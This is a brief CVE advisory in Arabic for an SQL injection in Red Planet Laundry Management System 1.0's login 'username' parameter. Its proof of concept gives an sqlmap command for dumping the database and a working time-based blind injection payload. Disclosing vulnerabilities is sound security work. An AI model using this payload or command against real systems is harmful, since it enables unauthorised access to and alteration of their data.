
CVE-2022-28452
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28452 https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-28452 https://laundry.redplanetcomputers.com/
1-الوصف:
نظام Red Planet Laundry Management System 1.0 معرض لثغرة SQL Injection عبر المعامل 'username' في /index.php/login/rediract. قد يؤدي استغلال هذه المشكلة إلى تمكين المهاجم من اختراق التطبيق، أو الوصول إلى البيانات أو تعديلها، أو استغلال ثغرات كامنة في قاعدة البيانات الأساسية.
2-إثبات المفهوم:
في Burpsuite، قم باعتراض الطلب من الصفحة المتأثرة باستخدام المعامل 'username' واحفظه باسم poc.txt. ثم قم بتشغيل SQLmap لاستخراج البيانات من قاعدة البيانات: sqlmap.py -r poc.txt --dbms=mysql
3-مثال للحمولة:
تم تعيين إدخال username في POST المشفر بالـ URL إلى 0'XOR(if(now()=sysdate(),sleep(4),0))XOR'Z
تفاصيل الاتصال: [email protected]